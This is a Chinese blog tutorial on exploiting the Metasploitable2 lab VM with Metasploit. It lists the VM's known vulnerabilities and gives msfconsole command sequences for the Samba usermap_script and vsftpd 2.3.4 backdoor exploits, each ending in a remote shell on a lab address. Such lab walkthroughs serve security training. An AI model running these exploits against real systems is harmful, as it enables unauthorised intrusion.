Metasploit -- 攻击Metasploitable2靶机

简介: Metasploit -- 攻击Metasploitable2靶机

一、Metasploitable2简介

Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。

开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。

Metasploit able 2是一个虚拟机文件, 从网上下载解压之后就可以直接使用,不需要自己安装。

下载地址:https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

用户名:msfadmin 密码:msfadmin

二、Metasploitable2漏洞列表

1、弱口令漏洞(如vnc、mysql、PostgreSQL等)

2、Samba MS-RPC Shell命令注入漏洞

3、Vsftpd源码包后门漏洞

4、UnreallRCd后门漏洞

5、Linux NFS共享目录配置漏洞

6、Java RMI SERVER命令执行漏洞

7、Tomcat管理台默认口令漏洞

8、root用户弱口令漏洞(SSH爆破)

9、Distcc后门漏洞

10、Samba sysmlink默认配置目录遍历漏洞

11、PHP CGI参数注入执行漏洞

12、DRuby远程代码执行漏洞

13、Ingreslock后门漏洞

14、Rlogin后门漏洞

三、Samba MS-RPC Shell命令注入漏洞

漏洞产生原因:传递通过MS-RPC提供的未过滤的用户 输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。

攻击机:kali linux IP:192.168.1.133

靶机:Metasploitable2 IP:192.168.1.131

1、启动数据库并且打开metasploit控制台:msfconsole

0a2653c851af460fa595bd959398a8f1.png

2、搜索可利用的模块:search samba

0eacb84100b54626af849e6b562bf92a.png

3、选择要利用的模块:use exploit/multi/samba/usermap_script

查看需要设置的参数:show options

需要设置目标ip和端口(默认139)

2d65d23f6d4748949b924e4057485923.png

4、设置目标主机地址:192.168.1.131

2e9b90b2ca334476abebe75bafe6eeaa.png

5、运行:run 此时已建立shell连接

4cebaac233b3433da32a72337a77fc60.png

6、查看目标主机目录文件:ls

6de278e6d6694ce5bb08e7e842b7e74b.png

四、Vsftpd源码包后门漏洞

漏洞产生原因:在特定版本的vsftpd服务器程序中, 被人恶意植入代码,当用户名以“: )”为结尾,服务器就会在6200端口监听,并且能够执行任意恶意代码。

攻击机:kali linux IP:192.168.1.133

靶机:Metasploitable2 IP:192.168.1.136

1、搜索可用攻击模块:search vsftpd

0a2653c851af460fa595bd959398a8f1.png

2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor

查看需要设置的参数:show options

需要设置目标ip和端口(默认21)

0eacb84100b54626af849e6b562bf92a.png

3、设置目标主机地址:192.168.1.136

2d65d23f6d4748949b924e4057485923.png

4、 运行:run 此时已建立shell连接

2e9b90b2ca334476abebe75bafe6eeaa.png

5、查看目标主机目录文件:ls

4cebaac233b3433da32a72337a77fc60.png

禁止非法,后果自负

目录
相关文章
|
9月前
|
安全 Shell
Metasploit系列(二) -- 漏洞利用
Metasploit系列(二) -- 漏洞利用
86 0
|
4月前
|
安全 Linux Shell
Kali渗透测试:使用Metasploit对Web应用的攻击
Kali渗透测试:使用Metasploit对Web应用的攻击
204 4
|
4月前
|
安全 Linux 网络安全
Kali 渗透测试:利用HTA文件进行渗透攻击
Kali 渗透测试:利用HTA文件进行渗透攻击
74 1
|
4月前
|
安全 网络协议 Linux
Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击
103 0
|
4月前
|
安全 Linux 网络安全
Kali渗透测试:使用browser_autopwn2模块进行渗透攻击
Kali渗透测试:使用browser_autopwn2模块进行渗透攻击
100 0
|
安全 测试技术 网络安全
如何使用Metasploit进行漏洞利用?
如何使用Metasploit进行漏洞利用?
259 0
|
安全 Windows
msfvenom生成木马之控制靶机
msfvenom生成木马之控制靶机
293 0
|
SQL 安全 Shell
FristiLeaks v1.3靶机渗透
FristiLeaks v1.3靶机渗透
|
监控 安全 Windows
Metasploit -- 木马生成原理和方法
Metasploit -- 木马生成原理和方法
761 0
Metasploit -- 木马生成原理和方法
|
网络协议
Metasploit -- 指定端口扫描主机
Metasploit -- 指定端口扫描主机
118 0
Metasploit -- 指定端口扫描主机